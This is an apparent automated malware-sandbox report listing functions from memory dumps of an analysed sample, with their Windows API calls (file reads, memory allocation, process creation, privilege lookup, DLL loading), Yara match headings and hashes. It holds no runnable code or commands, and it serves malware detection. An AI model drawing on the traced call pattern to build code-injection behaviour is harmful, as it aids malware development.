Instruction Fuzzy Hash: 2AF0B6B2200108ABCB08DF88DC84DEB77ADAF8C754F158248BA0D97240C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 04339D62, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,04334B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04334B87,007A002E,00000000,00000060,00000000,00000000), ref: 04339DAD

Strings

.z`, xrefs: 04339D9D, 04339DA8

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 86142fc715fd6b29a1cd1e0a8e5842023ce0c7e8d2a8b88b8c4b4948ad2c766f
Instruction ID: 9c8b526745b5e7da3637a7f327029cb5876a1f808fb93c915fc8f6dd6e7ebb1d
Opcode Fuzzy Hash: 86142fc715fd6b29a1cd1e0a8e5842023ce0c7e8d2a8b88b8c4b4948ad2c766f
Instruction Fuzzy Hash: C6F07FB2201108AFDB48DF98DC94EEB77A9EF8C754F158248FA5DE7250D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04339D1C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,04334B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04334B87,007A002E,00000000,00000060,00000000,00000000), ref: 04339DAD

Strings

.z`, xrefs: 04339D9D, 04339DA8

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
Instruction ID: 878a424ba4150ff1324cdc62f2a51b4d00caa778e9bbd46e1d71c37b550a8e51
Opcode Fuzzy Hash: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
Instruction Fuzzy Hash: 80F079B2204409AF8B48CE8CDC81CEB73AAAF8C744B118208FA0DD3240D630E8618BA4

Uniqueness

Uniqueness Score: -1.00%

Function 04339DB2, Relevance: 1.6, APIs: 1, Instructions: 74filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(04334D42,5EB6522D,FFFFFFFF,04334A01,?,?,04334D42,?,04334A01,FFFFFFFF,5EB6522D,04334D42,?,00000000), ref: 04339E55

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c1fa000e90d34bf42ddfbf86a07caf1619767b7776371418e6baa9b9c10b0ef5
Instruction ID: 1fc85afc6eaeee031500aae7d90e7c9bccaaf74dbe76ff3cce6427cae3f20fd9
Opcode Fuzzy Hash: c1fa000e90d34bf42ddfbf86a07caf1619767b7776371418e6baa9b9c10b0ef5
Instruction Fuzzy Hash: 4B21DBB6200108AFDB14DF99DC84EEB77A9EF8C714F168648BE5DA7251C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04339E0A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(04334D42,5EB6522D,FFFFFFFF,04334A01,?,?,04334D42,?,04334A01,FFFFFFFF,5EB6522D,04334D42,?,00000000), ref: 04339E55

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 93eb0eb999d413ebda49711963d4b38f3d66a9e8483457c18ca6db01c9c7dd9f
Instruction ID: c74ad294d4ee2961fb5e39a8ecca9cf625da2b35b0c6472aa63049b0038bf4fb
Opcode Fuzzy Hash: 93eb0eb999d413ebda49711963d4b38f3d66a9e8483457c18ca6db01c9c7dd9f
Instruction Fuzzy Hash: 07F0E7B2204608ABDB14DF89DC80EEB77A9EF8C754F058248FA5DA7251D630E9518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04339E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(04334D42,5EB6522D,FFFFFFFF,04334A01,?,?,04334D42,?,04334A01,FFFFFFFF,5EB6522D,04334D42,?,00000000), ref: 04339E55

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 29da5825caa1baa4aad403cc499c3878bd8e5c8d2593c4a7b7dd035dbf82de45
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: DEF0A9B2200108ABDB14DF89DC80DEB77ADEF8C754F158248BA5DA7251D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04339F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,04322D11,00002000,00003000,00000004), ref: 04339F79

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: c1ca08e2c3b331b111a5cd6fdf2b29f1761b6f9e883599bae47c97f9265f1f3c
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 2FF015B2200208ABDB14DF89CC80EAB77ADEF88654F118148BE48A7241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04339E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(04334D20,?,?,04334D20,00000000,FFFFFFFF), ref: 04339EB5

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: ccf044f89b5789d6885e3f1eb3572fbc30035a95501c84e675187d4b87d7bc9a
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: A8D012752002186BD710EBD8CC85E97775CEF44664F154455BA586B241C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04D295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D295DA

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ff11e4583318547ff34ee9bed134ebd0ee8d847ce25acf3f191a57113c86012
Instruction ID: 5ccfefa3fb7514416cc4777ac354c0de914528022a96a38a0b0d14b01ed05f2d
Opcode Fuzzy Hash: 3ff11e4583318547ff34ee9bed134ebd0ee8d847ce25acf3f191a57113c86012
Instruction Fuzzy Hash: B99002A121200007610571594414616401B97E4647F55C021E10055A0DC565D8E17565

Uniqueness

Uniqueness Score: -1.00%

Function 04D29540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D2954A

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 93f83ac0a1df08d9aed9b15e58e8275ea4efaf36ae478e07758c0845c25222fd
Instruction ID: e890acdb1826c9ce25520745e5eb5906a94a54eb1f3e13602f653f34735fb1a7
Opcode Fuzzy Hash: 93f83ac0a1df08d9aed9b15e58e8275ea4efaf36ae478e07758c0845c25222fd
Instruction Fuzzy Hash: 2E900265221000072105A5590704507005797D9797755C021F1006560CD661D8B16561

Uniqueness

Uniqueness Score: -1.00%

Function 04D296D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D296DA

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09ac23adcccd6c5f726b8c4c3ddde57c34596fd1a5a012561edb13dc1ba62669
Instruction ID: b577480764b24fcad513825c2431dc0c9053739b6e02282436de6319c51aa144
Opcode Fuzzy Hash: 09ac23adcccd6c5f726b8c4c3ddde57c34596fd1a5a012561edb13dc1ba62669
Instruction Fuzzy Hash: 4D90027121100846F10061594404B46001697E4747F55C016A0115664D8655D8A17961

Uniqueness

Uniqueness Score: -1.00%

Function 04D296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D296EA

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb8792e6cf5e06105ad8611d9a4955f5a5649a074b6b7c89dd59c6f0f3396326
Instruction ID: b93b908384e5322a42fc5ccab35e45f13f687282d487aaa646dfc885efc642d0
Opcode Fuzzy Hash: cb8792e6cf5e06105ad8611d9a4955f5a5649a074b6b7c89dd59c6f0f3396326
Instruction Fuzzy Hash: ED90027121108806F1106159840474A001697D4747F59C411A4415668D86D5D8E17561

Uniqueness

Uniqueness Score: -1.00%

Function 04D29650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D2965A

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d983775dee2f7f5bdd687ba1238df7130b5cbe49983bc1e000727d2ee81727fc
Instruction ID: 4be5ac9966e5dbb0bf40d7dec75d3bb1c1c2bbd749fd819fe1213f5947c64e02
Opcode Fuzzy Hash: d983775dee2f7f5bdd687ba1238df7130b5cbe49983bc1e000727d2ee81727fc
Instruction Fuzzy Hash: 9990027121504846F14071594404A46002697D474BF55C011A00556A4D9665DDA5BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D29660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D2966A

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1a6d5e814c2375ed8c03bcdf368cbfb0265fc0a7500495b093eb1fca4e49d4e
Instruction ID: a81f732dee4e1d8cdbc431a92974a82ee2c0a8d7a2cf8d81b2fe34524ea21fca
Opcode Fuzzy Hash: e1a6d5e814c2375ed8c03bcdf368cbfb0265fc0a7500495b093eb1fca4e49d4e
Instruction Fuzzy Hash: 3B90027121100806F1807159440464A001697D5747F95C015A0016664DCA55DAA97BE1

Uniqueness

Uniqueness Score: -1.00%

Function 04D29FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D29FEA

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 91e2c5cd3d85bd7b962e2d6fbe6a9635334f0312e319ca2b61f717ac8c039cec
Instruction ID: db3667cc6c11f6b53b3a0bca26ca2dd5f3231ea88da7f07898e01fee87b8ebec
Opcode Fuzzy Hash: 91e2c5cd3d85bd7b962e2d6fbe6a9635334f0312e319ca2b61f717ac8c039cec
Instruction Fuzzy Hash: 0490027132114406F11061598404706001697D5647F55C411A0815568D86D5D8E17562

Uniqueness

Uniqueness Score: -1.00%

Function 04D29780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D2978A

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c0c29f571adab787481f197b9629d2f9ad3b698ed8736cd3c2df055a97537a7
Instruction ID: 4e5cee4202f6bce2ee2ae2009d185299b6d8619e438f785664f97e99d84535c1
Opcode Fuzzy Hash: 8c0c29f571adab787481f197b9629d2f9ad3b698ed8736cd3c2df055a97537a7
Instruction Fuzzy Hash: DA90026922300006F1807159540860A001697D5647F95D415A0006568CC955D8B96761

Uniqueness

Uniqueness Score: -1.00%

Function 04D29710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D2971A

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5706c49351cacbf40311fc97cc644378a77ac64d43e70537a89cfc94a85070f8
Instruction ID: a76d5730282a4115eb634ab9dae2b4fa237d9db8568effc7958198a3e1654146
Opcode Fuzzy Hash: 5706c49351cacbf40311fc97cc644378a77ac64d43e70537a89cfc94a85070f8
Instruction Fuzzy Hash: F690027121100406F10065995408646001697E4747F55D011A5015565EC6A5D8E17571

Uniqueness

Uniqueness Score: -1.00%

Function 04D29840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D2984A

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b90194acdeaa3c87f42d40c718fa7658d60540e04b9e3bb4e2f1bd28c4a8eaa
Instruction ID: 9cd50199c04adf7afc8541f08e8a08c2a956de1129605c3509005480184062f4
Opcode Fuzzy Hash: 8b90194acdeaa3c87f42d40c718fa7658d60540e04b9e3bb4e2f1bd28c4a8eaa
Instruction Fuzzy Hash: 83900261252041567545B15944045074017A7E4687B95C012A1405960C8566E8A6EA61

Uniqueness

Uniqueness Score: -1.00%

Function 04D29860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D2986A

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b69d36cbb2c3de7a3e1bdc2f1520de0113ccc0e7b8fcf13fedd67ef1295c614
Instruction ID: d0f1ac3eaacc32674136a1a228136c09ea295d113680e6adbd6c22261b27ccdc
Opcode Fuzzy Hash: 0b69d36cbb2c3de7a3e1bdc2f1520de0113ccc0e7b8fcf13fedd67ef1295c614
Instruction Fuzzy Hash: 1A90027121100417F11161594504707001A97D4687F95C412A0415568D9696D9A2B561

Uniqueness

Uniqueness Score: -1.00%

Function 04D299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D299AA

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3501a01747688a3d5352652e708759d4d56787701b749c6b62dfe816adcd97b
Instruction ID: 74a60dc9c665a374f0eef38ae3f06b80d98e86689125f1b0c6adacfeba51a9d1
Opcode Fuzzy Hash: e3501a01747688a3d5352652e708759d4d56787701b749c6b62dfe816adcd97b
Instruction Fuzzy Hash: BF9002A135100446F10061594414B060016D7E5747F55C015E1055564D8659DCA27566

Uniqueness

Uniqueness Score: -1.00%

Function 04D29910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D2991A

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ad896f74c8c0cb497d3ba6ae1fc46efbde6fb62040a8beff0e797de52c05d68
Instruction ID: e0490a1d4c52201cbbae5c0ccf82a38b765af4b2d0d709504510fe3a0d8735ec
Opcode Fuzzy Hash: 3ad896f74c8c0cb497d3ba6ae1fc46efbde6fb62040a8beff0e797de52c05d68
Instruction Fuzzy Hash: B49002B121100406F14071594404746001697D4747F55C011A5055564E8699DDE57AA5

Uniqueness

Uniqueness Score: -1.00%

Function 04D29A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D29A5A

Memory Dump Source

Source File: 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: true

Associated: 00000008.00000002.913120947.0000000004DDB000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.913136262.0000000004DDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45b0964d33d23249e9563cbb47847e1815c8a7d5a80d2f2fe5dbe2012206abff
Instruction ID: 3811f6794b29a7b0fb10270966f3d3fbd0be1bee54dd7e3ec07656910fa2ea90
Opcode Fuzzy Hash: 45b0964d33d23249e9563cbb47847e1815c8a7d5a80d2f2fe5dbe2012206abff
Instruction Fuzzy Hash: 8A90026122180046F20065694C14B07001697D4747F55C115A0145564CC955D8B16961

Uniqueness

Uniqueness Score: -1.00%

Function 0433A062, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04323AF8), ref: 0433A09D

Strings

.z`, xrefs: 0433A08C, 0433A098

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: ed7d125529ebe9e47b958ca8cff064b2f4cb866de79aff8c2721dab898822073
Instruction ID: a7ac4b672cb6e382720ddcd95dd5dd4aabd662d1ae06b8d1596818c5bd66bdeb
Opcode Fuzzy Hash: ed7d125529ebe9e47b958ca8cff064b2f4cb866de79aff8c2721dab898822073
Instruction Fuzzy Hash: 66F0A0712002046BDB25DF75CC85EEB3BA9EF84360F124399F8589B291C631E811CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0433A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04323AF8), ref: 0433A09D

Strings

.z`, xrefs: 0433A08C, 0433A098

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: ec97bc02f2e268149c59e1d75d062aac36e2c0d93c1b39f4a16a2d5e90d61678
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 8AE04FB12002086BD714EF99CC44EA777ACEF88754F018554FD4867251C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 043282E8, Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0432834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0432836B

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e70f7439e828e9456f62e2231761d08ada3c7e4ff60d7be9b9f94131263597bb
Instruction ID: b4b021c5c04a4b1c492d44fd45985b9865cb94e758d2fd3fec78e1813b8c1258
Opcode Fuzzy Hash: e70f7439e828e9456f62e2231761d08ada3c7e4ff60d7be9b9f94131263597bb
Instruction Fuzzy Hash: 1601D431A802387BF721BA949D42FFEB62CAF40E55F141114FF04BA1C1E6947A0643E5

Uniqueness

Uniqueness Score: -1.00%

Function 043282F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0432834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0432836B

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
Instruction ID: a813bd84e1a23a34b70362ac472aa8fc079162fa0a83a6a9953df2aa4e31638d
Opcode Fuzzy Hash: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
Instruction Fuzzy Hash: 7C018F31A802387BF721BA949D42FBE766CAF40A55F145118FB04BA1C1E694790646E5

Uniqueness

Uniqueness Score: -1.00%

Function 0432ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0432AD42

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: a10e852db77cc8349cf1479abd77251ec22e6a19d96730adf6c621bbeb1e4f61
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: B2011EB6D0020DABEF10EBE4DD45F9DB3789F44609F105195E908A7281F671F7548B91

Uniqueness

Uniqueness Score: -1.00%

Function 0433A0DD, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0433A134

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 361dda97c99b2950f9200c5d62909d4050bb8900db09959657a8e506155513b7
Instruction ID: fa0c90af3425a16593f46f83799afa80761dd4ad413c09c2c56d018162a77cf7
Opcode Fuzzy Hash: 361dda97c99b2950f9200c5d62909d4050bb8900db09959657a8e506155513b7
Instruction Fuzzy Hash: E601DDB2200108ABCB54CF99CC80EEB37A9AF8C754F118248BA0DA3240D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0433A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0433A134

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 539a30af533a4ee92945763c63a1ee540f41c41583b67e1c5f50acac1a763c61
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: C301AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA4DA7250C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0433A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(04334506,?,04334C7F,04334C7F,?,04334506,?,?,?,?,?,00000000,00000000,?), ref: 0433A05D

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 8fb64a9c74f17ad391dc863dac33c6e6b4c63865c85722b438017993e915282f
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 52E046B1200208ABDB14EF99CC80EA777ACEF88664F128558FE486B241C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0433A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0432F1A2,0432F1A2,?,00000000,?,?), ref: 0433A200

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: fec5e2246f4e6c3b1886a578c3ae2b921bb472ddcbba3291bc543a2b83bf08d1
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: E7E04FB12002086BDB10EF89CC84EE737ADEF88654F018154FE4C67241CA30F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0432F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,04328CF4,?), ref: 0432F6CB
